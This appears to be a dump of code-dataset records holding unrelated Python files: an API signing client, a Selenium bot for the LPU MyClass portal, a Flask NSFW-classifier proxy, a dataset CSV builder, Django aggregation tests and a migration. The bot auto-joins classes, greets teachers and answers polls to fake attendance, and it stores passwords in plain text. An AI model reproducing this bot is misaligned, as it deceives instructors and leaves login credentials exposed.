self.host, self.uri, ps)\n msg = bytes(msg, 'utf-8')\n secret_key = bytes(self.secret_key, 'utf-8')\n \n if self.sign_method == 'HmacSHA256':\n digestmod = hashlib.sha256\n else:\n digestmod = hashlib.sha1\n \n hashed = hmac.new(secret_key, msg, digestmod)\n base64 = binascii.b2a_base64(hashed.digest())[:-1]\n base64 = base64.decode()\n return base64\n\n def sign_encode(self, method):\n \"\"\"\n 对签名结果做编码处理\n \"\"\"\n # 获取签名\n sign_str = self.build(method)\n # 增加签名段\n self.param[\"Signature\"] = sign_str\n # 生成的签名串并不能直接作为请求参数,需要对其进行 URL 编码\n return urlencode(self.param)\n","sub_path":"base/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"293703853","text":"#################---//open this app at the exact time of lecture start\\\\---########################\nimport os\ntry:\n from selenium import webdriver\n from webdriver_manager.chrome import ChromeDriverManager\n from tkinter import Tk\n from tkinter import simpledialog\n import os\n import time\n import datetime\n from selenium.webdriver.support.ui import WebDriverWait\n from selenium.webdriver.common.by import By\n from selenium.webdriver.support import expected_conditions as EC\n from selenium.webdriver.common.keys import Keys\nexcept:\n os.system('pip install selenium')\n os.system('pip install webdriver-manager')\n os.system('pip install datetime')\n os.system('pip install tk')\n os.system('pip install urllib3')\nfinally:\n from selenium import webdriver\n from webdriver_manager.chrome import ChromeDriverManager\n from tkinter import Tk\n from tkinter import simpledialog\n import os\n import time\n import datetime\n from selenium.webdriver.support.ui import WebDriverWait\n from selenium.webdriver.common.by import By\n from selenium.webdriver.support import expected_conditions as EC\n from selenium.webdriver.common.keys import Keys\n\nroot=Tk()\ndriver = webdriver.Chrome(ChromeDriverManager().install())\ndriver.maximize_window()\n\ndef get_details():\n global usrnm\n global pswd\n root.withdraw()\n if os.path.isfile('login_up.txt'):\n f=open('login_up.txt','r')\n usrnm=f.readline()\n pswd=f.readline()\n else:\n f=open('login_up.txt','w')\n usrnm=simpledialog.askstring(title=\"Username\",prompt=\"Enter the Username here:\")\n f.write(\"u-\"+usrnm+\"\\n\")\n pswd=simpledialog.askstring(title=\"Password\",prompt=\"Enter the Password here:\")\n f.write(\"p-\"+pswd)\n f.close()\n f=open('login_up.txt','r')\n usrnm=f.readline()\n pswd=f.readline()\n f.close()\n \n usrnm=usrnm[2:10]\n pswd=pswd[2:]\n\ndef poll():\n try:\n try: # //*[@id=\"frame\"]\n frame = WebDriverWait(driver,1).until(EC.visibility_of_element_located((By.XPATH, '//*[@id=\"frame\"]')))\n driver.switch_to.frame(frame)\n except Exception as e: \n print(\"-\",end=\"\")\n time.sleep(10)\n try:\n driver.find_element_by_xpath('//*[@id=\"app\"]/main/div[2]/div/span/div[2]/div[1]/button').click()\n print(\" :)Polled!\")\n except:\n print(\"-\",end=\"\")\n\n except Exception as e:\n print(\".\",end=\"\")\n\ndef wishTeacher():\n now = datetime.datetime.now()\n wiish=\"\"\n if(now.minute <= 10):\n if(now.hour<12):\n wish=\"Good Morning\"\n elif(now.hour>=12 and now.hour<=16):\n wish=\"Good Afternoon\"\n else:\n wish=\"Good Evening\"\n\n try:\n WebDriverWait(driver,10).until(EC.visibility_of_element_located((By.XPATH,'//*[@id=\"app\"]/main/section/div/header/div/div[1]/div[1]/button')))\n time.sleep(7)\n driver.find_element_by_xpath('//*[@id=\"app\"]/main/section/div/header/div/div[1]/div[1]/button').click()\n driver.find_element_by_xpath('//*[@id=\"chat-toggle-button\"]').click()\n chatbox = driver.find_element_by_id(\"message-input\")\n # chatbox.send_keys(wish)\n chatbox.send_keys(wish)\n chatbox.send_keys(Keys.RETURN)\n except Exception as e:\n print(\"Teacher not wished:-(\")\n\ndef get_time(timest):\n #eg->9:00 AM - 10:00 AM\n timest=timest.split(\" -\") \n timest=timest[0]\n if 'AM' in timest:\n print(timest)\n final_time=timest[:-3]+':00'\n print(final_time)\n else:\n final_time=timest[:-3]\n final_time=final_time.split(\":\")\n temp=final_time[1]\n final_time=final_time[0]\n if not final_time=='12':\n addtwl=str(int(final_time)+12)\n final_time=addtwl+\":\"+temp+\":00\"\n else:\n addtwl=str(int(final_time)+0)\n final_time=addtwl+\":\"+temp+\":00\"\n print(final_time)\n return final_time\n\ndef jot(final_time):\n timestamp = time.strftime('%H:%M')\n print(timestamp)\n ft=final_time[0:5].split(':')\n ct=timestamp.split(':')\n print(ft,ct)\n diffh=-int(ft[0])+int(ct[0])\n diffm=-int(ft[1])+int(ct[1])\n diff=diffh*60+diffm\n print(diff)\n if diff>-1 and diff<=70:\n print(\"You are late by \"+str(diff)+\" m.\\nLets join...\")\n return 0\n elif diff>-1 and diff>70:\n print('Your class finished '+str(diff)+'m ago.')\n return -1\n else:\n print('You have '+str(-diff)+' m to start the class.')\n return diff\n\n\ndef join_audio():\n try:\n frame = WebDriverWait(driver, 300).until(EC.visibility_of_element_located((By.XPATH, '//*[@id=\"frame\"]')))\n driver.switch_to.frame(frame)\n listenMode = WebDriverWait(driver, 10).until(EC.visibility_of_element_located((By.XPATH, '/html/body/div[2]/div/div/div[1]/div/div/span/button[2]')))\n listenMode.click()\n except Exception as e:\n print(\"No Audio Mode\")\n print(\"Audio Mode Selected\")\n\n\ndef site_login():\n driver.get(\"https://myclass.lpu.in/\")\n get_details()\n driver.find_element_by_xpath('/html/body/div[2]/div/form/div[6]/input[1]').send_keys(usrnm)\n driver.find_element_by_xpath('/html/body/div[2]/div/form/div[6]/input[2]').send_keys(pswd)\n driver.find_element_by_xpath('/html/body/div[2]/div/form/div[7]/button').click()\n driver.find_element_by_xpath('//*[@id=\"homeCenterDiv\"]/div/div[1]/div/div[2]/a').click()\n# //*[@id=\"homeCenterDiv\"]/div/div[1]/div/div[2]/a\n time.sleep(5)\n \n a=[]\n links=[]\n b=[]\n clstime=[]\n count=0\n a=driver.find_elements_by_css_selector(\".fc-time-grid-event.fc-event.fc-start.fc-end\")\n for i in range (len(a)):\n app=str(i+1)\n b.append(driver.find_element_by_xpath('//*[@id=\"calendar\"]/div[2]/div/table/tbody/tr/td/div/div/div[3]/table/tbody/tr/td[2]/div/div[2]/a['+app+']/div/div[1]'))\n for i in a:\n links.append(i.get_attribute(\"href\"))\n count+=1\n for i in b:\n print(i.get_attribute(\"data-full\"))\n clstime.append(get_time(i.get_attribute(\"data-full\")))\n # final_time=i.get_attribute(\"data-full\")\n # print(final_time)\n # # final_time=get_time(final_time)\n # clstime.append(i.get_attribute(i.get_attribute(\"data-full\")))\n\n # print(a)\n # print(links)\n # print(clstime)\n\n wincnt=1\n\n\n\n #time wise attendence\n # for prd in clstime:\n # if jot(prd)==1:\n # driver.get(links[clscount])\n # elif jot(prd)==0:\n # print('classdone')\n # else:\n # time.sleep(jot(-prd*60))\n # clscount=clscount+1\n\n for j in links:\n try:\n jot(clstime[wincnt-1])\n except:\n print('jot//no')\n driver.get(j)\n time.sleep(1)\n try:\n driver.find_element_by_css_selector(\".btn.btn-primary.btn-block.btn-sm\").click()\n flag=True\n except Exception as e:\n print(\"Join btn not found A.K.A #SEDLYF #STRUGGLEISREAL\")\n flag=False\n if flag:\n join_audio()\n wishTeacher()\n time.sleep(5)\n for k in range(11):\n # try:\n # driver.find_element_by_id(\"message-input\").send_keys(\"Okay\")\n # driver.find_element_by_id(\"message-input\").send_keys(Keys.RETURN)\n # except Exception as e:\n # print(\"Msg box and ok btn not found\")\n # break\n for l in range(300):\n time.sleep(1)\n poll()\n \n print(\"\\n----------------#---------------------#------------------#-----------------------\") \n driver.execute_script(\"window.open('');\")\n driver.switch_to.window(driver.window_handles[wincnt])\n wincnt+=1\nsite_login()\n\n\n\n\n\n","sub_path":"LPUMyClass.py","file_name":"LPUMyClass.py","file_ext":"py","file_size_in_byte":7890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"313341754","text":"import json, requests, base64, sys\n\nfrom io import BytesIO\nfrom flask import Flask, request\nfrom keras.preprocessing import image\n\nmodel_server_port = sys.argv[1]\nmodel_name = 'nsfw'\n\nserver_host = sys.argv[2]\nserver_port = int(sys.argv[3])\n\ntarget_size=(299, 299)\n\napp = Flask(__name__)\n\ndef predict_raw(image_array):\n\n instances = []\n \n for img in image_array:\n \n img = image.img_to_array(img) / 255.\n \n instances.append({ \"input_image\": img.astype('float16').tolist() })\n\n response = requests.post('http://127.0.0.1:' + model_server_port + '/v1/models/' + model_name + ':predict', json = { \n \n \"instances\": instances\n \n })\n \n return response.content.decode('utf-8')\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n\n image_array = []\n \n for image_base64 in request.json:\n \n image_array.append(image.load_img(BytesIO(base64.b64decode(image_base64)),target_size=target_size))\n \n return predict_raw(image_array)\n \n@app.route('/predict_local', methods=['POST'])\ndef predict_local():\n\n image_array = []\n \n for image_path in request.json:\n \n image_array.append(image.load_img(image_path,target_size=target_size))\n\n return predict_raw(image_array)\n \napp.run(host=server_host, port=server_port)","sub_path":"extra/nsfw/flask_server.py","file_name":"flask_server.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"288985613","text":"import os\nimport pandas as pd\n\nannotations_path = '../../muct/muct-landmarks/muct76-opencv.csv'\nannotations = pd.read_csv(annotations_path).drop_duplicates()\n\nimage_root = '../../muct/dataset'\n\nval_set = 'jpg_5'\ntraining_images = []\nimage_name_list = []\nfor root, dir, filenames in os.walk(image_root):\n if (root == os.path.join(image_root, val_set)) & (root != image_root):\n for filename in filenames:\n training_images.append(os.path.join(root.split('/')[-1], filename))\n image_name_list.append(filename.split('.')[0])\n\ntraining_items = []\nannotations_columns = list(annotations)\nannotations_columns.remove('tag')\nfor inx, item in annotations.iterrows():\n training_item = []\n name = item[0]\n if name in image_name_list:\n tmp = image_name_list.index(name)\n image_path = training_images[tmp]\n training_item.append(image_path)\n landmarks = item[2:]\n training_item.extend(landmarks)\n\n training_items.append(training_item)\n\ntraining = pd.DataFrame(training_items, columns=annotations_columns).reset_index(drop=True)\n\ntraining.to_csv('test.csv', index=False)","sub_path":"face-alignment-tensorflow/utils/create_train_test_csv.py","file_name":"create_train_test_csv.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"407053744","text":"from __future__ import absolute_import\n\nimport datetime\nfrom decimal import Decimal\n\nfrom django.db.models import Avg, Sum, Count, Max, Min\nfrom django.test import TestCase, Approximate\n\nfrom .models import Author, Publisher, Book, Store\n\n\nclass BaseAggregateTestCase(TestCase):\n fixtures = [\"aggregation.json\"]\n\n def test_empty_aggregate(self):\n self.assertEqual(Author.objects.all().aggregate(), {})\n\n def test_single_aggregate(self):\n vals = Author.objects.aggregate(Avg(\"age\"))\n self.assertEqual(vals, {\"age__avg\": Approximate(37.4, places=1)})\n\n def test_multiple_aggregates(self):\n vals = Author.objects.aggregate(Sum(\"age\"), Avg(\"age\"))\n self.assertEqual(vals, {\"age__sum\": 337, \"age__avg\": Approximate(37.4, places=1)})\n\n def test_filter_aggregate(self):\n vals = Author.objects.filter(age__gt=29).aggregate(Sum(\"age\"))\n self.assertEqual(len(vals), 1)\n self.assertEqual(vals[\"age__sum\"], 254)\n\n def test_related_aggregate(self):\n vals = Author.objects.aggregate(Avg(\"friends__age\"))\n self.assertEqual(len(vals), 1)\n self.assertAlmostEqual(vals[\"friends__age__avg\"], 34.07, places=2)\n\n vals = Book.objects.filter(rating__lt=4.5).aggregate(Avg(\"authors__age\"))\n self.assertEqual(len(vals), 1)\n self.assertAlmostEqual(vals[\"authors__age__avg\"], 38.2857, places=2)\n\n vals = Author.objects.all().filter(name__contains=\"a\").aggregate(Avg(\"book__rating\"))\n self.assertEqual(len(vals), 1)\n self.assertEqual(vals[\"book__rating__avg\"], 4.0)\n\n vals = Book.objects.aggregate(Sum(\"publisher__num_awards\"))\n self.assertEqual(len(vals), 1)\n self.assertEqual(vals[\"publisher__num_awards__sum\"], 30)\n\n vals = Publisher.objects.aggregate(Sum(\"book__price\"))\n self.assertEqual(len(vals), 1)\n self.assertEqual(vals[\"book__price__sum\"], Decimal(\"270.27\"))\n\n def test_aggregate_multi_join(self):\n vals = Store.objects.aggregate(Max(\"books__authors__age\"))\n self.assertEqual(len(vals), 1)\n self.assertEqual(vals[\"books__authors__age__max\"], 57)\n\n vals = Author.objects.aggregate(Min(\"book__publisher__num_awards\"))\n self.assertEqual(len(vals), 1)\n self.assertEqual(vals[\"book__publisher__num_awards__min\"], 1)\n\n def test_aggregate_alias(self):\n vals = Store.objects.filter(name=\"Amazon.com\").aggregate(amazon_mean=Avg(\"books__rating\"))\n self.assertEqual(len(vals), 1)\n self.assertAlmostEqual(vals[\"amazon_mean\"], 4.08, places=2)\n\n def test_annotate_basic(self):\n self.assertQuerysetEqual(\n Book.objects.annotate().order_by('pk'), [\n \"The Definitive Guide to Django: Web Development Done Right\",\n \"Sams Teach Yourself Django in 24 Hours\",\n \"Practical Django Projects\",\n \"Python Web Development with Django\",\n \"Artificial Intelligence: A Modern Approach\",\n \"Paradigms of Artificial Intelligence Programming: Case Studies in Common Lisp\"\n ],\n lambda b: b.name\n )\n\n books = Book.objects.annotate(mean_age=Avg(\"authors__age\"))\n b = books.get(pk=1)\n self.assertEqual(\n b.name,\n 'The Definitive Guide to Django: Web Development Done Right'\n )\n self.assertEqual(b.mean_age, 34.5)\n\n def test_annotate_m2m(self):\n books = Book.objects.filter(rating__lt=4.5).annotate(Avg(\"authors__age\")).order_by(\"name\")\n self.assertQuerysetEqual(\n books, [\n ('Artificial Intelligence: A Modern Approach', 51.5),\n ('Practical Django Projects', 29.0),\n ('Python Web Development with Django', Approximate(30.3, places=1)),\n ('Sams Teach Yourself Django in 24 Hours', 45.0)\n ],\n lambda b: (b.name, b.authors__age__avg),\n )\n\n books = Book.objects.annotate(num_authors=Count(\"authors\")).order_by(\"name\")\n self.assertQuerysetEqual(\n books, [\n ('Artificial Intelligence: A Modern Approach', 2),\n ('Paradigms of Artificial Intelligence Programming: Case Studies in Common Lisp', 1),\n ('Practical Django Projects', 1),\n ('Python Web Development with Django', 3),\n ('Sams Teach Yourself Django in 24 Hours', 1),\n ('The Definitive Guide to Django: Web Development Done Right', 2)\n ],\n lambda b: (b.name, b.num_authors)\n )\n\n def test_backwards_m2m_annotate(self):\n authors = Author.objects.filter(name__contains=\"a\").annotate(Avg(\"book__rating\")).order_by(\"name\")\n self.assertQuerysetEqual(\n authors, [\n ('Adrian Holovaty', 4.5),\n ('Brad Dayley', 3.0),\n ('Jacob Kaplan-Moss', 4.5),\n ('James Bennett', 4.0),\n ('Paul Bissex', 4.0),\n ('Stuart Russell', 4.0)\n ],\n lambda a: (a.name, a.book__rating__avg)\n )\n\n authors = Author.objects.annotate(num_books=Count(\"book\")).order_by(\"name\")\n self.assertQuerysetEqual(\n authors, [\n ('Adrian Holovaty', 1),\n ('Brad Dayley', 1),\n ('Jacob Kaplan-Moss', 1),\n ('James Bennett', 1),\n ('Jeffrey Forcier', 1),\n ('Paul Bissex', 1),\n ('Peter Norvig', 2),\n ('Stuart Russell', 1),\n ('Wesley J. Chun', 1)\n ],\n lambda a: (a.name, a.num_books)\n )\n\n def test_reverse_fkey_annotate(self):\n books = Book.objects.annotate(Sum(\"publisher__num_awards\")).order_by(\"name\")\n self.assertQuerysetEqual(\n books, [\n ('Artificial Intelligence: A Modern Approach', 7),\n ('Paradigms of Artificial Intelligence Programming: Case Studies in Common Lisp', 9),\n ('Practical Django Projects', 3),\n ('Python Web Development with Django', 7),\n ('Sams Teach Yourself Django in 24 Hours', 1),\n ('The Definitive Guide to Django: Web Development Done Right', 3)\n ],\n lambda b: (b.name, b.publisher__num_awards__sum)\n )\n\n publishers = Publisher.objects.annotate(Sum(\"book__price\")).order_by(\"name\")\n self.assertQuerysetEqual(\n publishers, [\n ('Apress', Decimal(\"59.69\")),\n (\"Jonno's House of Books\", None),\n ('Morgan Kaufmann', Decimal(\"75.00\")),\n ('Prentice Hall', Decimal(\"112.49\")),\n ('Sams', Decimal(\"23.09\"))\n ],\n lambda p: (p.name, p.book__price__sum)\n )\n\n def test_annotate_values(self):\n books = list(Book.objects.filter(pk=1).annotate(mean_age=Avg(\"authors__age\")).values())\n self.assertEqual(\n books, [\n {\n \"contact_id\": 1,\n \"id\": 1,\n \"isbn\": \"159059725\",\n \"mean_age\": 34.5,\n \"name\": \"The Definitive Guide to Django: Web Development Done Right\",\n \"pages\": 447,\n \"price\": Approximate(Decimal(\"30\")),\n \"pubdate\": datetime.date(2007, 12, 6),\n \"publisher_id\": 1,\n \"rating\": 4.5,\n }\n ]\n )\n\n books = Book.objects.filter(pk=1).annotate(mean_age=Avg('authors__age')).values('pk', 'isbn', 'mean_age')\n self.assertEqual(\n list(books), [\n {\n \"pk\": 1,\n \"isbn\": \"159059725\",\n \"mean_age\": 34.5,\n }\n ]\n )\n\n books = Book.objects.filter(pk=1).annotate(mean_age=Avg(\"authors__age\")).values(\"name\")\n self.assertEqual(\n list(books), [\n {\n \"name\": \"The Definitive Guide to Django: Web Development Done Right\"\n }\n ]\n )\n\n books = Book.objects.filter(pk=1).values().annotate(mean_age=Avg('authors__age'))\n self.assertEqual(\n list(books), [\n {\n \"contact_id\": 1,\n \"id\": 1,\n \"isbn\": \"159059725\",\n \"mean_age\": 34.5,\n \"name\": \"The Definitive Guide to Django: Web Development Done Right\",\n \"pages\": 447,\n \"price\": Approximate(Decimal(\"30\")),\n \"pubdate\": datetime.date(2007, 12, 6),\n \"publisher_id\": 1,\n \"rating\": 4.5,\n }\n ]\n )\n\n books = Book.objects.values(\"rating\").annotate(n_authors=Count(\"authors__id\"), mean_age=Avg(\"authors__age\")).order_by(\"rating\")\n self.assertEqual(\n list(books), [\n {\n \"rating\": 3.0,\n \"n_authors\": 1,\n \"mean_age\": 45.0,\n },\n {\n \"rating\": 4.0,\n \"n_authors\": 6,\n \"mean_age\": Approximate(37.16, places=1)\n },\n {\n \"rating\": 4.5,\n \"n_authors\": 2,\n \"mean_age\": 34.5,\n },\n {\n \"rating\": 5.0,\n \"n_authors\": 1,\n \"mean_age\": 57.0,\n }\n ]\n )\n\n authors = Author.objects.annotate(Avg(\"friends__age\")).order_by(\"name\")\n self.assertEqual(len(authors), 9)\n self.assertQuerysetEqual(\n authors, [\n ('Adrian Holovaty', 32.0),\n ('Brad Dayley', None),\n ('Jacob Kaplan-Moss', 29.5),\n ('James Bennett', 34.0),\n ('Jeffrey Forcier', 27.0),\n ('Paul Bissex', 31.0),\n ('Peter Norvig', 46.0),\n ('Stuart Russell', 57.0),\n ('Wesley J. Chun', Approximate(33.66, places=1))\n ],\n lambda a: (a.name, a.friends__age__avg)\n )\n\n def test_count(self):\n vals = Book.objects.aggregate(Count(\"rating\"))\n self.assertEqual(vals, {\"rating__count\": 6})\n\n vals = Book.objects.aggregate(Count(\"rating\", distinct=True))\n self.assertEqual(vals, {\"rating__count\": 4})\n\n def test_fkey_aggregate(self):\n explicit = list(Author.objects.annotate(Count('book__id')))\n implicit = list(Author.objects.annotate(Count('book')))\n self.assertEqual(explicit, implicit)\n\n def test_annotate_ordering(self):\n books = Book.objects.values('rating').annotate(oldest=Max('authors__age')).order_by('oldest', 'rating')\n self.assertEqual(\n list(books), [\n {\n \"rating\": 4.5,\n \"oldest\": 35,\n },\n {\n \"rating\": 3.0,\n \"oldest\": 45\n },\n {\n \"rating\": 4.0,\n \"oldest\": 57,\n },\n {\n \"rating\": 5.0,\n \"oldest\": 57,\n }\n ]\n )\n\n books = Book.objects.values(\"rating\").annotate(oldest=Max(\"authors__age\")).order_by(\"-oldest\", \"-rating\")\n self.assertEqual(\n list(books), [\n {\n \"rating\": 5.0,\n \"oldest\": 57,\n },\n {\n \"rating\": 4.0,\n \"oldest\": 57,\n },\n {\n \"rating\": 3.0,\n \"oldest\": 45,\n },\n {\n \"rating\": 4.5,\n \"oldest\": 35,\n }\n ]\n )\n\n def test_aggregate_annotation(self):\n vals = Book.objects.annotate(num_authors=Count(\"authors__id\")).aggregate(Avg(\"num_authors\"))\n self.assertEqual(vals, {\"num_authors__avg\": Approximate(1.66, places=1)})\n\n def test_filtering(self):\n p = Publisher.objects.create(name='Expensive Publisher', num_awards=0)\n Book.objects.create(\n name='ExpensiveBook1',\n pages=1,\n isbn='111',\n rating=3.5,\n price=Decimal(\"1000\"),\n publisher=p,\n contact_id=1,\n pubdate=datetime.date(2008,12,1)\n )\n Book.objects.create(\n name='ExpensiveBook2',\n pages=1,\n isbn='222',\n rating=4.0,\n price=Decimal(\"1000\"),\n publisher=p,\n contact_id=1,\n pubdate=datetime.date(2008,12,2)\n )\n Book.objects.create(\n name='ExpensiveBook3',\n pages=1,\n isbn='333',\n rating=4.5,\n price=Decimal(\"35\"),\n publisher=p,\n contact_id=1,\n pubdate=datetime.date(2008,12,3)\n )\n\n publishers = Publisher.objects.annotate(num_books=Count(\"book__id\")).filter(num_books__gt=1).order_by(\"pk\")\n self.assertQuerysetEqual(\n publishers, [\n \"Apress\",\n \"Prentice Hall\",\n \"Expensive Publisher\",\n ],\n lambda p: p.name,\n )\n\n publishers = Publisher.objects.filter(book__price__lt=Decimal(\"40.0\")).order_by(\"pk\")\n self.assertQuerysetEqual(\n publishers, [\n \"Apress\",\n \"Apress\",\n \"Sams\",\n \"Prentice Hall\",\n \"Expensive Publisher\",\n ],\n lambda p: p.name\n )\n\n publishers = Publisher.objects.annotate(num_books=Count(\"book__id\")).filter(num_books__gt=1, book__price__lt=Decimal(\"40.0\")).order_by(\"pk\")\n self.assertQuerysetEqual(\n publishers, [\n \"Apress\",\n \"Prentice Hall\",\n \"Expensive Publisher\",\n ],\n lambda p: p.name,\n )\n\n publishers = Publisher.objects.filter(book__price__lt=Decimal(\"40.0\")).annotate(num_books=Count(\"book__id\")).filter(num_books__gt=1).order_by(\"pk\")\n self.assertQuerysetEqual(\n publishers, [\n \"Apress\",\n ],\n lambda p: p.name\n )\n\n publishers = Publisher.objects.annotate(num_books=Count(\"book\")).filter(num_books__range=[1, 3]).order_by(\"pk\")\n self.assertQuerysetEqual(\n publishers, [\n \"Apress\",\n \"Sams\",\n \"Prentice Hall\",\n \"Morgan Kaufmann\",\n \"Expensive Publisher\",\n ],\n lambda p: p.name\n )\n\n publishers = Publisher.objects.annotate(num_books=Count(\"book\")).filter(num_books__range=[1, 2]).order_by(\"pk\")\n self.assertQuerysetEqual(\n publishers, [\n \"Apress\",\n \"Sams\",\n \"Prentice Hall\",\n \"Morgan Kaufmann\",\n ],\n lambda p: p.name\n )\n\n publishers = Publisher.objects.annotate(num_books=Count(\"book\")).filter(num_books__in=[1, 3]).order_by(\"pk\")\n self.assertQuerysetEqual(\n publishers, [\n \"Sams\",\n \"Morgan Kaufmann\",\n \"Expensive Publisher\",\n ],\n lambda p: p.name,\n )\n\n publishers = Publisher.objects.annotate(num_books=Count(\"book\")).filter(num_books__isnull=True)\n self.assertEqual(len(publishers), 0)\n\n def test_annotation(self):\n vals = Author.objects.filter(pk=1).aggregate(Count(\"friends__id\"))\n self.assertEqual(vals, {\"friends__id__count\": 2})\n\n books = Book.objects.annotate(num_authors=Count(\"authors__name\")).filter(num_authors__ge=2).order_by(\"pk\")\n self.assertQuerysetEqual(\n books, [\n \"The Definitive Guide to Django: Web Development Done Right\",\n \"Artificial Intelligence: A Modern Approach\",\n ],\n lambda b: b.name\n )\n\n authors = Author.objects.annotate(num_friends=Count(\"friends__id\", distinct=True)).filter(num_friends=0).order_by(\"pk\")\n self.assertQuerysetEqual(\n authors, [\n \"Brad Dayley\",\n ],\n lambda a: a.name\n )\n\n publishers = Publisher.objects.annotate(num_books=Count(\"book__id\")).filter(num_books__gt=1).order_by(\"pk\")\n self.assertQuerysetEqual(\n publishers, [\n \"Apress\",\n \"Prentice Hall\",\n ],\n lambda p: p.name\n )\n\n publishers = Publisher.objects.filter(book__price__lt=Decimal(\"40.0\")).annotate(num_books=Count(\"book__id\")).filter(num_books__gt=1)\n self.assertQuerysetEqual(\n publishers, [\n \"Apress\",\n ],\n lambda p: p.name\n )\n\n books = Book.objects.annotate(num_authors=Count(\"authors__id\")).filter(authors__name__contains=\"Norvig\", num_authors__gt=1)\n self.assertQuerysetEqual(\n books, [\n \"Artificial Intelligence: A Modern Approach\",\n ],\n lambda b: b.name\n )\n\n def test_more_aggregation(self):\n a = Author.objects.get(name__contains='Norvig')\n b = Book.objects.get(name__contains='Done Right')\n b.authors.add(a)\n b.save()\n\n vals = Book.objects.annotate(num_authors=Count(\"authors__id\")).filter(authors__name__contains=\"Norvig\", num_authors__gt=1).aggregate(Avg(\"rating\"))\n self.assertEqual(vals, {\"rating__avg\": 4.25})\n\n def test_even_more_aggregate(self):\n publishers = Publisher.objects.annotate(earliest_book=Min(\"book__pubdate\")).exclude(earliest_book=None).order_by(\"earliest_book\").values()\n self.assertEqual(\n list(publishers), [\n {\n 'earliest_book': datetime.date(1991, 10, 15),\n 'num_awards': 9,\n 'id': 4,\n 'name': 'Morgan Kaufmann'\n },\n {\n 'earliest_book': datetime.date(1995, 1, 15),\n 'num_awards': 7,\n 'id': 3,\n 'name': 'Prentice Hall'\n },\n {\n 'earliest_book': datetime.date(2007, 12, 6),\n 'num_awards': 3,\n 'id': 1,\n 'name': 'Apress'\n },\n {\n 'earliest_book': datetime.date(2008, 3, 3),\n 'num_awards': 1,\n 'id': 2,\n 'name': 'Sams'\n }\n ]\n )\n\n vals = Store.objects.aggregate(Max(\"friday_night_closing\"), Min(\"original_opening\"))\n self.assertEqual(\n vals,\n {\n \"friday_night_closing__max\": datetime.time(23, 59, 59),\n \"original_opening__min\": datetime.datetime(1945, 4, 25, 16, 24, 14),\n }\n )\n\n def test_annotate_values_list(self):\n books = Book.objects.filter(pk=1).annotate(mean_age=Avg(\"authors__age\")).values_list(\"pk\", \"isbn\", \"mean_age\")\n self.assertEqual(\n list(books), [\n (1, \"159059725\", 34.5),\n ]\n )\n\n books = Book.objects.filter(pk=1).annotate(mean_age=Avg(\"authors__age\")).values_list(\"isbn\")\n self.assertEqual(\n list(books), [\n ('159059725',)\n ]\n )\n\n books = Book.objects.filter(pk=1).annotate(mean_age=Avg(\"authors__age\")).values_list(\"mean_age\")\n self.assertEqual(\n list(books), [\n (34.5,)\n ]\n )\n\n books = Book.objects.filter(pk=1).annotate(mean_age=Avg(\"authors__age\")).values_list(\"mean_age\", flat=True)\n self.assertEqual(list(books), [34.5])\n\n books = Book.objects.values_list(\"price\").annotate(count=Count(\"price\")).order_by(\"-count\", \"price\")\n self.assertEqual(\n list(books), [\n (Decimal(\"29.69\"), 2),\n (Decimal('23.09'), 1),\n (Decimal('30'), 1),\n (Decimal('75'), 1),\n (Decimal('82.8'), 1),\n ]\n )\n\n def test_dates_with_aggregation(self):\n \"\"\"\n Test that .dates() returns a distinct set of dates when applied to a\n QuerySet with aggregation.\n\n Refs #18056. Previously, .dates() would return distinct (date_kind,\n aggregation) sets, in this case (year, num_authors), so 2008 would be\n returned twice because there are books from 2008 with a different\n number of authors.\n \"\"\"\n dates = Book.objects.annotate(num_authors=Count(\"authors\")).dates('pubdate', 'year')\n self.assertQuerysetEqual(\n dates, [\n \"datetime.date(1991, 1, 1)\",\n \"datetime.date(1995, 1, 1)\",\n \"datetime.date(2007, 1, 1)\",\n \"datetime.date(2008, 1, 1)\"\n ]\n )\n","sub_path":"tests/django20/aggregation/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":21295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"376458674","text":"from orator.migrations import Migration\n\n\nclass CreateBibliotecaTable(Migration):\n\n def up(self):\n \"\"\"\n Run the migrations.\n \"\"\"\n with self.schema.create('Biblioteca') as table:\n table.increments('idBiblioteca')\n table.string('Nombre_Biblioteca', 50)\n table.string('Direccion', 70)\n table.timestamps()\n\n def down(self):\n \"\"\"\n Revert the migrations.\n \"\"\"\n self.schema.drop('Biblioteca')\n","sub_path":"Semana8Hackaton/Bryan Arias/App/migrations/2020_07_18_205037_create_biblioteca_table.py","file_name":"2020_07_18_205037_create_biblioteca_table.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"435700181","text":"#! /usr/bin/python3\n\nimport psycopg2\n\n\nclass Query:\n \"\"\" Object to hold query information for dynamic query calls.\n\n Stores information about a query such as a title and template string for\n printing the results, as well as the query string itself. This allows a\n single method to process queries via dynamic input.\n\n Attributes:\n title: A title to display when printing query results\n string: The actual SQL query string to execute.\n template: The format string used to parse each printed result.\n \"\"\"\n def __init__(self, title, string, template):\n self.title = title\n self.string = string\n self.template = template\n\n\n# Define the required queries\nqTopArticles = Query(\n \"Most Popular Articles\",\n '''\n SELECT title, views FROM article_views\n JOIN articles\n ON path LIKE CONCAT('%%/', slug)\n LIMIT %s;\n ''',\n \"\\\"{}\\\" - {} views\"\n)\n\nqTopAuthors = Query(\n \"Most Popular Authors\",\n '''\n SELECT name, SUM(views) as sums FROM article_views\n JOIN articles ON path LIKE CONCAT('%%/', slug)\n JOIN authors ON articles.author = authors.id\n GROUP BY name\n ORDER BY sums DESC;\n ''',\n \"{} - {} views\"\n)\n\nqBadRequests = Query(\n \"Bad Reqests\",\n '''\n SELECT dates, result FROM percentage\n WHERE result > %s\n ORDER BY dates;\n ''',\n \"{:%B %d, %Y} - {:.2%} errors\"\n)\n\n\ndef printResults(title, results, template):\n # Start the output off with the title (centered) and an underline\n output = \"\\n{1: ^80}\\n{0:-<80}\\n\"\n\n # Then add a centered line 